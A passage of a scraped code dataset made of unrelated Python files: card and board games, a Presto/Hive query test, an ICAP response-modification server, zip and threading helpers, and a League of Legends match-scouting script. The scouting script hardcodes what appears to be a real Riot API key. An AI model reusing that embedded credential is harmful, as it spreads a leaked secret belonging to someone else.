\"coins!\")\n Users.setBalance(player.name, player.deck)\n else:\n print(\"Player\", player.name, \"stayed at his rate!\")\n else:\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n\n #Еще в том же составе\n while True:\n print(\"\\nDo yoe want to play again (y/n)?: \", end='')\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True) == True):\n if (playerInput == 'y'):\n newList = []\n for player in players:\n if (Users.getBalance(player.name, False) <= 0):\n print(\"Player\", player.name, \"have not enough coins, he will be deleted from the session!\\n\")\n Users.rem(player.name)\n else:\n newList.append(player)\n for player in players:\n player.sum = 0\n player.isInBeginBJ = False\n player.isWin = False\n player.isLose = False\n player.listOfCards = []\n player.bet = 0\n players = newList\n break\n elif (playerInput == 'n'):\n return\n\n #return\n","sub_path":"Projects/MiniGames/BlackJack/BlackJack.py","file_name":"BlackJack.py","file_ext":"py","file_size_in_byte":13183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207931882","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 11 00:27:38 2016\n\n@author: dhuynh\n\"\"\"\n\n\nresponses={}\nflag='y'\nwhile flag=='y':\n name=raw_input('Your name is: ')\n response=raw_input('Where do you want to go for a vacation this year? ')\n responses[name]=response\n flag=raw_input('continue (y/n)? ')\n if flag=='n':\n break\nprint(responses)\nfor name,response in responses.items():\n print(name+' wants to go to '+response+' this year.')\n \n\n","sub_path":"inputFillDictionary.py","file_name":"inputFillDictionary.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"268973592","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 19:21:28 2020\n\n@author: Micky\n\n\"\"\"\ncoordinate = []\n\n \n\nboard_numbers = range(1,16) \nboard = []\nfor i in range(3): #put 4 in row\n board.append([])\n for j in range(4): # put 4 in column\n board[i].append(coordinate) # add [] each spot\n\n\ndef print_board(board):\n for i in board:\n \n print (' '.join(map(str, i))) \nprint(print_board(board)) #print the board\n\n\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"230929356","text":"\"\"\"\nhive连接与读写测试,hive操作方式就是直接执行sql语句,连接的都是preto服务地址\n\"\"\"\n\n# drop table if exists user;\n\ndef sqlalchemy_test():\n from sqlalchemy.engine import create_engine\n import pandas as pd\n engine = create_engine('presto://192.168.11.127:30890/hive/default') # host是服务器ip,port是端口,hive指的是Presto的catalog, default是默认的库,可以换成其他的。\n df = pd.read_sql(\"select * from day_result\", engine) # 和一般pandas从数据库中读取数据无任何区别\n print(df)\n\n\ndef pyhive_test():\n from pyhive import presto\n # 通过presto访问hive, presto也支持rest api访问\n conn = presto.Connection(host='192.168.11.127', port=30890)\n cursor = conn.cursor()\n # sql_str = 'create table user_product(id INTEGER);'\n cursor.execute('select * from day_result')\n # cursor.execute(sql_str)\n\n result = cursor.fetchall()\n print(result)\n\n\nif __name__ == '__main__':\n pyhive_test()\n sqlalchemy_test()","sub_path":"project/database-test/py_hive.py","file_name":"py_hive.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"553571291","text":"#!/bin/env python\n# -*- coding: utf8 -*-\n\nimport random\nimport tempfile\nimport time\nimport socket\nimport collections\nimport gzip\nimport imghdr\n\ntry:\n from urllib.parse import urlparse\nexcept ImportError:\n from urlparse import urlparse\n\ntry:\n import socketserver\nexcept ImportError:\n import SocketServer\n socketserver = SocketServer\n\nimport sys\nsys.path.append('.')\n\nfrom pyicap import *\n\nclass ThreadingSimpleServer(socketserver.ThreadingMixIn, ICAPServer):\n pass\n\nclass ICAPHandler(BaseICAPRequestHandler):\n\n def service_OPTIONS(self):\n self.set_icap_response(200)\n self.set_icap_header(b'Methods', b'RESPMOD')\n self.set_icap_header(b'Service', b'PyICAP Server 1.0')\n self.set_icap_header(b'Preview', b'0')\n self.set_icap_header(b'Transfer-Preview', b'*')\n self.set_icap_header(b'Transfer-Ignore', b'bmp,ico,gif,jpg,jpe,jpeg,png,tiff,crl,avi,divx,flv,h264,mp4,mpg,mpeg,swf,wmv,mp3,wav,ttf,pdf,rar,tar,zip,gz,bz2,jar,js,json,htm,html,dhtml,shtml,css,rss,xml<0d>')\n self.set_icap_header(b'Transfer-Complete', b'')\n self.set_icap_header(b'Max-Connections', b'200')\n self.set_icap_header(b'Options-TTL', b'3600')\n self.send_headers(False)\n\n def read_into(self, f):\n while True:\n try:\n chunk = self.read_chunk()\n if chunk == b'':\n return\n f.write(chunk)\n except:\n return\n def service_RESPMOD(self):\n self.set_icap_response(200)\n self.set_enc_status(b' '.join(self.enc_res_status))\n for h in self.enc_res_headers:\n for v in self.enc_res_headers[h]:\n self.set_enc_header(h, v)\n\n if not self.has_body:\n self.send_headers(False)\n return\n with tempfile.NamedTemporaryFile(prefix='pyicap.', suffix='.tmp') as upstream:\n self.read_into(upstream)\n if self.preview and not self.ieof:\n self.cont()\n self.read_into(upstream)\n upstream.seek(0)\n try:\n with gzip.open(upstream, \"rb\") as f:\n data = f.read()\n except:\n pass\n # And write it to downstream\n upstream.seek(0)\n content = upstream.read()\n self.send_headers(True)\n self.write_chunk(content)\n \n def parse_request(self):\n \"\"\"Parse a request (internal).\n The request should be stored in self.raw_requestline; the results\n are in self.command, self.request_uri, self.request_version and\n self.headers.\n Return True for success, False for failure; on failure, an\n error is sent back.\n \"\"\"\n self.command = None\n self.request_version = version = 'ICAP/1.0'\n\n # Default behavior is to leave connection open\n self.close_connection = False\n\n requestline = self.raw_requestline.rstrip(b'\\r\\n')\n self.requestline = requestline\n self.log_error(self.requestline)\n words = requestline.split()\n if len(words) != 3:\n raise ICAPError(400, \"Bad request syntax (%r)\" % requestline)\n\n command, request_uri, version = words\n\n if version[:5] != b'ICAP/':\n raise ICAPError(400, \"Bad request protocol, only accepting ICAP\")\n\n if command not in (b'OPTIONS', b'REQMOD', b'RESPMOD'):\n raise ICAPError(501, \"command %r is not implemented\" % command)\n\n try:\n base_version_number = version.split(b'/', 1)[1]\n version_number = base_version_number.split(b\".\")\n # RFC 2145 section 3.1 says there can be only one \".\" and\n # - major and minor numbers MUST be treated as\n # separate integers;\n # - ICAP/2.4 is a lower version than ICAP/2.13, which in\n # turn is lower than ICAP/12.3;\n # - Leading zeros MUST be ignored by recipients.\n if len(version_number) != 2:\n raise ValueError\n version_number = int(version_number[0]), int(version_number[1])\n except (ValueError, IndexError):\n raise ICAPError(400, \"Bad request version (%r)\" % version)\n\n if version_number != (1, 0):\n raise ICAPError(\n 505, \"Invalid ICAP Version (%s)\" % base_version_number\n )\n\n self.command, self.request_uri, self.request_version = \\\n command, request_uri, version\n\n # Examine the headers and look for a Connection directive\n self.headers = self._read_headers()\n\n conntype = self.headers.get(b'connection', [b''])[0]\n if conntype.lower() == b'close':\n self.close_connection = True\n\n self.encapsulated = {}\n if self.command in [b'RESPMOD', b'REQMOD']:\n for enc in self.headers.get(b'encapsulated', [b''])[0].split(b','):\n # TODO: raise ICAPError if Encapsulated is malformed or empty\n if len(enc.strip().split(b'=')) > 1:\n k, v = enc.strip().split(b'=')\n self.encapsulated[k] = int(v)\n\n self.preview = self.headers.get(b'preview', [None])[0]\n self.allow = [\n x.strip() for x in self.headers.get(b'allow', [b''])[0].split(b',')\n ]\n self.client_ip = self.headers.get(\n b'x-client-ip', b'No X-Client-IP header')[0]\n\n if self.command == b'REQMOD':\n if b'req-hdr' in self.encapsulated:\n self.enc_req = self._read_request()\n self.enc_req_headers = self._read_headers()\n if b'req-body' in self.encapsulated:\n self.has_body = True\n elif self.command == b'RESPMOD':\n if b'req-hdr' in self.encapsulated:\n self.enc_req = self._read_request()\n self.enc_req_headers = self._read_headers()\n if b'res-hdr' in self.encapsulated:\n self.enc_res_status = self._read_status()\n self.enc_res_headers = self._read_headers()\n if b'res-body' in self.encapsulated:\n self.has_body = True\n # Else: OPTIONS. No encapsulation.\n\n # Parse service name\n # TODO: document \"url routing\"\n self.servicename = urlparse(self.request_uri)[2].strip(b'/')\n \n def handle_one_request(self):\n def call_method():\n mname = (self.servicename + b'_' + self.command).decode(\"utf-8\")\n if not hasattr(self, mname):\n self.log_error(\"%s not found\" % mname)\n raise ICAPError(404)\n\n method = getattr(self, mname)\n if not isinstance(method, collections.Callable):\n raise ICAPError(404)\n method()\n self.close_connection = True\n \"\"\"Handle a single HTTP request.\n You normally don't need to override this method; see the class\n __doc__ string for information on how to handle specific HTTP\n commands such as GET and POST.\n \"\"\"\n\n # Initialize handler state\n self.enc_req = None\n self.enc_req_headers = {}\n self.enc_res_status = None\n self.enc_res_headers = {}\n self.has_body = False\n self.servicename = None\n self.encapsulated = {}\n self.ieof = False\n self.eob = False\n self.methos = None\n self.preview = None\n self.allow = set()\n self.client_ip = None\n\n self.icap_headers = {}\n self.enc_headers = {}\n self.enc_status = None # Seriously, need better names\n self.enc_request = None\n\n self.icap_response_code = None\n\n try:\n self.raw_requestline = self.rfile.readline(65537)\n self.log_error(self.raw_requestline)\n if not self.raw_requestline:\n self.close_connection = True\n return\n self.parse_request()\n call_method()\n self.wfile.flush()\n self.log_request(self.icap_response_code)\n except socket.timeout as e:\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = 1\n except ConnectionResetError as e:\n self.log_error(\"Connection reset error: %r\", e)\n self.close_connection = 1\n except ICAPError as e:\n msg = e.message[0] if isinstance(e.message, tuple) else e.message\n self.send_error(e.code, msg)\n #except:\n # self.send_error(500)\n\n\nport = 13440\n\nserver = ThreadingSimpleServer((b'', port), ICAPHandler)\ntry:\n while 1:\n server.handle_request()\nexcept KeyboardInterrupt:\n print(\"Finished\")\n","sub_path":"respmod_copy2.py","file_name":"respmod_copy2.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"570474925","text":"import logging\nimport os\nimport shutil\nimport subprocess\nimport sys\n\nfrom .config import PHRTOS_PROJECT_DIR, DEFAULT_TARGETS\n\n\nclass TargetBuilder:\n \"\"\"A base class that builds image needed to run all test cases\"\"\"\n\n TARGETS = DEFAULT_TARGETS\n SYSPAGE = {\n 'ia32-generic': [\n 'uart16550',\n 'pc-ata',\n 'psh'\n ]\n }\n\n def __init__(self, target):\n if target not in TargetBuilder.TARGETS:\n raise ValueError(f\"invalid target: {target}\")\n\n self.env = os.environ.copy()\n self.target = target\n self.fs_path = PHRTOS_PROJECT_DIR / f\"_fs/{self.target}\"\n\n self.env['TARGET'] = self.target\n self.env['CONSOLE'] = 'serial'\n self.env['SYSPAGE'] = ' '.join(TargetBuilder.SYSPAGE[self.target])\n\n def __str__(self):\n return self.target\n\n def fs_mkdir(self, path):\n if path.anchor == '/':\n path = path.relative_to('/')\n abs_path = self.fs_path / path\n abs_path.mkdir(exist_ok=True)\n\n def fs_install(self, path, file, mode):\n if path.anchor == '/':\n path = path.relative_to('/')\n abs_path = self.fs_path / path\n shutil.copy(file, abs_path)\n abs_path.joinpath(file.name).chmod(mode)\n\n def run_command(self, args, live_output=True, exit_at_error=True):\n proc = subprocess.Popen(\n args,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n env=self.env,\n cwd=PHRTOS_PROJECT_DIR\n )\n\n while live_output:\n output = proc.stdout.readline().decode('utf-8')\n if proc.poll() is not None and output == '':\n break\n if output:\n logging.info(output)\n\n out, err = proc.communicate()\n if proc.returncode != 0:\n logging.error(f\"Command {' '.join(args)} for {self.target} failed!\\n\")\n else:\n logging.debug(f\"Command {' '.join(args)} for {self.target} success!\\n\")\n\n logging.error(err.decode('utf-8'))\n if not live_output:\n logging.info(out.decode('utf-8'))\n\n if proc.returncode != 0 and exit_at_error:\n sys.exit(1)\n\n return proc.returncode, out, err\n\n def build(self):\n logging.info(f\"Building {self.env['TARGET']} with syspage: {self.env['SYSPAGE']}\\n\")\n self.run_command(['./phoenix-rtos-build/build.sh',\n 'clean',\n 'core',\n 'fs',\n 'test',\n 'image',\n 'project'])\n","sub_path":"trunner/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"186521233","text":"import numpy as np\n\ndocs = [[\"リンゴ\", \"リンゴ\"], [\"リンゴ\", \"レモン\"], [\"レモン\", \"ミカン\"]]\nterms = [\"リンゴ\", \"レモン\", \"ミカン\"]\n\ndef idf(term, docs):\n count = 0\n for doc in docs:\n if term in doc:\n count += 1\n return np.log10(len(docs) / count) + 1\n\nfor term in terms:\n print(\"idf({0}) = {1}\".format(term, idf(term, docs)))","sub_path":"p1_python演習/myanswer/a14.py","file_name":"a14.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"56355801","text":"import speech_recognition as sr\r\nimport asyncio\r\nimport datetime\r\nimport random\r\nimport websockets\r\nfrom datetime import datetime\r\nimport json\r\n\r\n\r\nasync def time(websocket, path):\r\n while True:\t\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Parler\")\r\n audio = r.listen(source)\r\n now = datetime.now()\r\n dateTime = now.strftime(\"%d/%m/%Y à %H:%M:%S\")\r\n try:\r\n data = r.recognize_google(audio, language='fr-FR')\r\n print(\"A \" + dateTime + \" vous avez dit: \" + data)\r\n if(data == \"red background\"):\r\n await websocket.send(json.dumps({'type': 'commande', 'typeC': 'background', 'color': 'red'}))\r\n else:\r\n await websocket.send(json.dumps({'type': 'text', 'dateTime': \"Le \" + dateTime + \" : \", 'text': data}))\r\n #await websocket.send(\"Le \" + dateTime + \" : \" + data)\r\n except sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\r\n await asyncio.sleep(random.random() * 3)\r\n\r\nstart_server = websockets.serve(time, \"127.0.0.1\", 5678)\r\nasyncio.get_event_loop().run_until_complete(start_server)\r\nasyncio.get_event_loop().run_forever()","sub_path":"back/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"633234758","text":"import io\nimport logging\nimport os\nimport zipfile\n\nfrom django.contrib.gis.geos.point import Point\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_zipfile_bytesio(base_dir):\n zip_file = io.BytesIO()\n\n with zipfile.ZipFile(zip_file, \"w\",\n compression=zipfile.ZIP_DEFLATED) as zf:\n path = os.path.normpath(base_dir)\n if path != os.curdir and path != base_dir:\n zf.write(path, os.path.relpath(path, base_dir))\n logger.info(\"adding '%s'\", path)\n for dirpath, dirnames, filenames in os.walk(base_dir):\n for name in sorted(dirnames):\n path = os.path.normpath(os.path.join(dirpath, name))\n zf.write(path, os.path.relpath(path, base_dir))\n logger.info(\"adding '%s'\", path)\n for name in filenames:\n path = os.path.normpath(os.path.join(dirpath, name))\n if os.path.isfile(path):\n zf.write(path, os.path.relpath(path, base_dir))\n logger.info(\"adding '%s'\", path)\n\n return zip_file\n\n\nclass ChunkIterator:\n\n def __init__(self, iterator, chunksize):\n self.iterator = iterator\n self.chunksize = chunksize\n\n def __iter__(self):\n return self\n\n def __next__(self):\n try:\n chunk = []\n for i in range(self.chunksize):\n chunk.append(next(self.iterator))\n finally:\n if chunk:\n return chunk\n else:\n raise StopIteration\n\n def next(self):\n return self.__next__()\n\n\nclass GeometryDefiner:\n LONGITUDE = 'longitude'\n LATITUDE = 'latitude'\n\n @staticmethod\n def get_geometry(column_names, row):\n if not isinstance(column_names, dict):\n return None\n if sorted(column_names.keys()) == [GeometryDefiner.LATITUDE,\n GeometryDefiner.LONGITUDE]:\n lat_column = column_names.get(GeometryDefiner.LATITUDE)\n long_column = column_names.get(GeometryDefiner.LONGITUDE)\n if all(row.get(column) for column in [long_column, lat_column]):\n x = float(row.get(long_column))\n y = float(row.get(lat_column))\n return Point(x, y)\n return None\n","sub_path":"geostore/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"310550775","text":"\"\"\"\r\nThreaded Reader\r\n\r\nThis wraps the reader classes to read multiple partitions concurrently.\r\n\r\nInternally it uses Queues to create the set of partitions to read from\r\nand to communicate what has been read. The number of threads, the number\r\nof items to put on the queues are limited - otherwise the readers are\r\nlikely to exhaust the memory available and crash the app.\r\n\r\nThe threaded reader is opinionated for datasets partitioned on filesystems\r\nor in blobs, where one dataset is split over multiple resources able to be\r\nconcurrently read and there is a a delay associated with reading the data,\r\nsuch as reading over a network or slow storage. Use in other situations\r\n(for example the MongoDB reader or where files are on local SSD storage)\r\nmay be detrimental to performance.\r\n\r\nThe number of Queue slots and the size of the chunks have had various\r\ncombinations tried, there may be performance improvements with larger\r\nnumbers for each, it's noth within the resolution of my system to be\r\nable to measure them.\r\n\"\"\"\r\nimport queue\r\nimport threading\r\nimport sys\r\nimport time\r\nfrom ...formats import dictset\r\n\r\ndef threaded_reader(items_to_read, reader, max_threads=4):\r\n \"\"\"\r\n Speed up reading sets of files - such as multiple days worth of log-per-day\r\n files.\r\n\r\n If you care about the order of the records, don't use this.\r\n\r\n Each file is in it's own thread, so reading a single file wouldn't benefit\r\n from this approach.\r\n \"\"\"\r\n thread_pool = []\r\n\r\n def thread_process():\r\n \"\"\"\r\n The process inside the threads.\r\n\r\n 1) Get any files off the file queue\r\n 2) Read the file in chunks\r\n 3) Put a chunk onto a reply queue\r\n \"\"\"\r\n try:\r\n source = source_queue.pop(0)\r\n except IndexError:\r\n source = None\r\n while source:\r\n source_reader = reader.read_from_source(source)\r\n for chunk in dictset.page_dictset(source_reader, 256):\r\n reply_queue.put(chunk) # this will wait until there's a slot\r\n try:\r\n source = source_queue.pop(0)\r\n except IndexError:\r\n source = None\r\n\r\n\r\n source_queue = items_to_read.copy()\r\n\r\n # scale the number of threads, if we have more than the number of files\r\n # we're reading, will have threads that never complete\r\n t = min(len(source_queue), max_threads, 8)\r\n reply_queue = queue.Queue(t * 8)\r\n\r\n # start the threads\r\n for _ in range(t):\r\n thread = threading.Thread(target=thread_process)\r\n thread.daemon = True\r\n thread.start()\r\n thread_pool.append(thread)\r\n time.sleep(0.01) # offset the start of the threads\r\n\r\n # when the threads are all complete and all the records have been read from\r\n # the reply queue, we're done\r\n while any([t.is_alive() for t in thread_pool]) or not(reply_queue.empty()):\r\n try:\r\n # don't wait forever\r\n records = reply_queue.get(timeout=10) \r\n yield from records\r\n except queue.Empty:\r\n pass # most likely reason get being here is a race condition","sub_path":"gva/data/readers/internals/threaded_reader.py","file_name":"threaded_reader.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"266880854","text":"import cassiopeia\nfrom datetime import *\nimport arrow\nimport copy\nfrom tkinter import *\nclass scout():\n\tdef __init__(this,playername,filters):\n\t\t#filter[type]\n\t\tthis.player = playername\n\t\tthis.summoner = this.getsummoner()\n\t\tthis.filters = filters\n\t\t#this.accounts = this.getaccounts()\n\t\tthis.matchlist = this.loadmatchlist()\n\t\tthis.analyzis_numbers = this.analyze()\n\n\tdef loadmatchlist(this):\n\t\tbegin_time = datetime.now()\n\t\tfourteen_days = timedelta(days=14)\n\t\tbegin_time = begin_time-fourteen_days\n\t\tbegin_time = arrow.get(begin_time)\n\t\tthis.cass_matchlist = cassiopeia.get_match_history(this.summoner,begin_time = begin_time,queues=[cassiopeia.Queue.ranked_solo_fives],seasons=[cassiopeia.Season.season_9])\n\t\treal_matchlist = []\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tmatch = this.cass_matchlist.pop()\n\t\t\t\treal_matchlist.append(cassiopeia.Match(id=match.id))\n\n\t\t\texcept Exception as e:\n\t\t\t\treal_matchlist.reverse()\n\t\t\t\tthis.cass_matchlist = cassiopeia.get_match_history(this.summoner,begin_time = begin_time,queues=[cassiopeia.Queue.ranked_solo_fives],seasons=[cassiopeia.Season.season_9])\n\t\t\t\treturn real_matchlist\n\n\tdef getsummoner(this):\n\t\treturn cassiopeia.get_summoner(name = this.player)\n\n\tdef analyze(this):\n\t\ttoret = {}\n\t\ttoret[\"kills\"]=0\n\t\ttoret[\"deaths\"]=0\n\t\ttoret[\"assists\"]=0\n\t\ttoret[\"vision_score\"]=0\n\t\ttoret[\"gold_spent\"]=0\n\t\ttoret[\"vision_wards_bought_in_game\"]=0\n\t\ttoret[\"total_damage_dealt_to_champions\"]=0\n\t\ttoret[\"time_CCing_others\"]=0\n\t\ttoret[\"time_played\"]=0\n\t\ttoret[\"champions\"]=[]\n\t\tfor match in this.matchlist:\n\t\t\tparticipants = match.participants\n\t\t\tdef is_this(participant):\n\t\t\t\treturn participant.summoner.account_id == this.summoner.account_id\n\t\t\tplayer = list(filter(is_this, participants))[0]\n\t\t\tmatch_stats = player.stats\n\t\t\ttoret[\"kills\"]+=match_stats.kills\n\t\t\ttoret[\"deaths\"]+=match_stats.deaths\n\t\t\ttoret[\"assists\"]+=match_stats.assists\n\t\t\ttoret[\"vision_score\"]+=match_stats.vision_score\n\t\t\ttoret[\"gold_spent\"]+=match_stats.gold_spent/(match.duration.total_seconds()/60)\n\t\t\ttoret[\"vision_wards_bought_in_game\"]+=match_stats.vision_wards_bought_in_game\n\t\t\ttoret[\"total_damage_dealt_to_champions\"]+=match_stats.total_damage_dealt_to_champions\n\t\t\ttoret[\"time_CCing_others\"]+=match_stats.time_CCing_others\n\t\ttoret[\"kills\"]=toret[\"kills\"]/len(this.matchlist)\n\t\ttoret[\"deaths\"]=toret[\"deaths\"]/len(this.matchlist)\n\t\ttoret[\"assists\"]=toret[\"assists\"]/len(this.matchlist)\n\t\ttoret[\"vision_score\"]=toret[\"vision_score\"]/len(this.matchlist)\n\t\ttoret[\"gold_spent\"]=toret[\"gold_spent\"]/len(this.matchlist)\n\t\ttoret[\"vision_wards_bought_in_game\"]=toret[\"vision_wards_bought_in_game\"]/len(this.matchlist)\n\t\ttoret[\"total_damage_dealt_to_champions\"]=toret[\"total_damage_dealt_to_champions\"]/len(this.matchlist)\n\t\ttoret[\"time_CCing_others\"]=toret[\"time_CCing_others\"]/len(this.matchlist)\n\t\treturn toret\n\n\tdef get_frame(this,root):\n\t\tthis.playerinfo = LabelFrame(root)\n\t\tplayername = Label(this.playerinfo,text=this.player)\n\t\tplayername.pack()\n\n\t\tleagueentry = list(this.summoner.league_entries(region = \"EUW\").filter(lambda x:x.queue==cassiopeia.Queue.ranked_solo_fives))[0]\n\t\tplayerrank = Label(this.playerinfo,text=str(leagueentry.tier)+\" \"+str(leagueentry.division))\n\t\tplayerrank.pack()\n\t\tthis.playerinfo.pack(side=LEFT)\n\t\tthis.matchesframe = Frame(root)\n\t\tthis.matchesframe.pack(side = LEFT)\n\t\tthis.matchframes = []\n\n\t\tfor match in this.matchlist:\n\n\t\t\tparticipants = match.participants\n\t\t\tdef is_this(participant):\n\t\t\t\treturn participant.summoner.account_id == this.summoner.account_id\n\t\t\tplayer = list(filter(is_this, participants))[0]\n\t\t\tmatch_stats = player.stats\n\n\t\t\t\n\t\t\tif match_stats.win:\n\t\t\t\tfr = LabelFrame(this.matchesframe,text=match.creation.format('YYYY-MM-DD'),background=\"blue\",width=root.winfo_reqwidth()/4)\n\t\t\telse:\n\t\t\t\tfr = LabelFrame(this.matchesframe,text=match.creation.format('YYYY-MM-DD'),background=\"red\",width=root.winfo_reqwidth()/4)\n\t\t\tthis.matchframes.append(fr)\n\t\t\tfr.grid_propagate(0)\n\n\t\t\tchampion = Label(fr,text = player.champion.name)\n\t\t\tchampion.pack(side = LEFT)\n\n\t\t\tkda = Label(fr,text = str(match_stats.kills)+\"/\"+str(match_stats.deaths)+\"/\"+str(match_stats.assists))\n\t\t\tkda.pack(side = RIGHT)\n\n\t\t\tfr.pack(fill=X)\n\t\tthis.statsframe = Frame(root)\n\t\tthis.statsframe.pack(side = RIGHT)\n\n\t\tthis.statframes = []\n\t\tindex = 0\n\t\tfor stat in this.analyzis_numbers.keys():\n\t\t\tfr = LabelFrame(this.statsframe,text = stat,width=root.winfo_reqwidth()*0.75)\n\t\t\tprint(this.analyzis_numbers[stat])\n\t\t\ttry:\n\t\t\t\trounded = round(this.analyzis_numbers[stat],2)\n\t\t\texcept Exception as e:\n\t\t\t\trounded = this.analyzis_numbers[stat]\n\t\t\t\n\t\t\tlb = Label(fr,text = str(rounded))\n\t\t\tthis.statframes.append(fr)\n\n\t\t\tfr.grid(row=index,sticky = \"we\")\n\n\t\t\tlb.pack(side=LEFT)\n\t\t\tindex+=1\n\n\n\n\ndef create_filter():\n\ttoret = {}\n\ttoret[\"begin_index\"]=None\n\ttoret[\"end_index\"]=None\n\ttoret[\"begin_time\"]=None\n\ttoret[\"end_time\"]=None\n\ttoret[\"queues\"]=420\n\ttoret[\"seasons\"]=None\n\ttoret[\"champions\"]=None\n\treturn toret\n\ncassiopeia.set_riot_api_key(\"RGAPI-a83c87b7-1d63-49a8-8d80-7f3e7ed4a38b\")\ncassiopeia.set_default_region(\"EUW\")\n\nfilters = create_filter()\n\nsc = (scout(\"OPY Yasuneri\",filters))\n\nfenetre = Tk()\nfenetre.geometry(\"500x500\")\nlabel = LabelFrame(fenetre,width=1200)\nsc.get_frame(label)\nlabel.pack()\n\nfenetre.mainloop()","sub_path":"scouting.py","file_name":"scouting.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"860213","text":"import os\r\n\r\nclass History():\r\n\tfname = os.path.join(\"info\", \"history.txt\")\r\n\tdef save(str):\r\n\t\t\"\"\"Добавляет к файлу history.txt в самое начало переданный аргумент. Если файла нет, то он будет создан\"\"\"\r\n\t\ttry:\r\n\t\t\t\"\"\"Открытие файла на чтение+запись\"\"\"\r\n\t\t\twith open(History.fname, \"r+\") as fp_w:\r\n\t\t\t\t\"\"\"Считывание файла\"\"\"\r\n\t\t\t\tlines = fp_w.readlines()\r\n\t\t\t\t\"\"\"Переход указателя на файл в самое начало\"\"\"\r\n\t\t\t\tfp_w.seek(0)\r\n\t\t\t\t\"\"\"Запись в файл данных, которые было изначально с данными, полученными в функцию\"\"\"\r\n\t\t\t\tfp_w.writelines(list(str) + lines)\r\n\t\texcept FileNotFoundError:\r\n\t\t\t\"\"\"В случае отсутствия файла history.txt - создать его и вызвать функцию еще раз\"\"\"\r\n\t\t\twith open(History.fname, \"w\") as create:\r\n\t\t\t\tHistory.save(str)\r\n\r\n\tdef load():\r\n\t\t\"\"\"Загружает данные из файла history.txt\"\"\"\r\n\t\tload = \"\"\r\n\t\twith open(History.fname, \"r\") as fp_r:\r\n\t\t\t\"\"\"Считывает данные из файла\"\"\"\r\n\t\t\tload = fp_r.readlines()\r\n\t\tret = \"\"\r\n\t\t\"\"\"Так как данные из файла считываются в список строк, то нужно их пр��образовать в строку\"\"\"\r\n\t\tfor i in load:\r\n\t\t\tret += i\r\n\t\treturn ret\r\n\r\n\tdef clear():\r\n\t\t\"\"\"Очищает файл history.txt\"\"\"\r\n\t\twith open(History.fname, \"w\") as f:\r\n\t\t\tpass\r\n","sub_path":"history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"430463089","text":"#!/usr/bin/env python\n\ndef get_ip_from_cfg(config):\n\n import re\n dict = {}\n with open(config) as cfg:\n rgex = ('(?P<intf>interface \\S+)''| ip ad\\S+ (?P<ip>\\S+) (?P<mask>\\S+)')\n for line in cfg:\n rslt = re.match(rgex, line)\n if rslt:\n if rslt.group('intf'):\n intf = rslt.group('intf')\n ip = mask = ''\n dict[intf] = {}\n else:\n ip = rslt.group('ip')\n mask = rslt.group('mask')\n dict[intf] = (ip, mask)\n\n rslt_dict = {}\n for l in dict.items():\n if ('', '') not in l:\n rslt_dict[l[0]] = l[1]\n return rslt_dict\n\nif __name__ == '__main__':\n print(get_ip_from_cfg('config_r1.txt'))\n","sub_path":"15_module_re/answ_task_15_1a_get_ip_from_cfg.py","file_name":"answ_task_15_1a_get_ip_from_cfg.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207893728","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Test the iotlabcli.parser.common module \"\"\"\n# pylint: disable=too-many-public-methods\n\nimport unittest\nimport sys\ntry:\n # pylint: disable=import-error,no-name-in-module\n from mock import patch, Mock\nexcept ImportError: # pragma: no cover\n # pylint: disable=import-error,no-name-in-module\n from unittest.mock import patch, Mock\nfrom iotlabcli.parser import common\n\n\nclass TestCommonParser(unittest.TestCase):\n \"\"\" Test the iotlab.parser.common module \"\"\"\n\n @patch('iotlabcli.rest.Api._method')\n def test_sites_list(self, _method_get_sited):\n \"\"\" Run get_sites method \"\"\"\n _method_get_sited.return_value = {\n \"items\": [{'site': 'grenoble'}, {'site': 'strasbourg'}]\n }\n\n self.assertEquals(['grenoble', 'strasbourg'], common.sites_list())\n self.assertEquals(['grenoble', 'strasbourg'], common.sites_list())\n self.assertEquals(1, _method_get_sited.call_count)\n\n def test_main_cli(self):\n \"\"\" Run the main-cli function \"\"\"\n function = 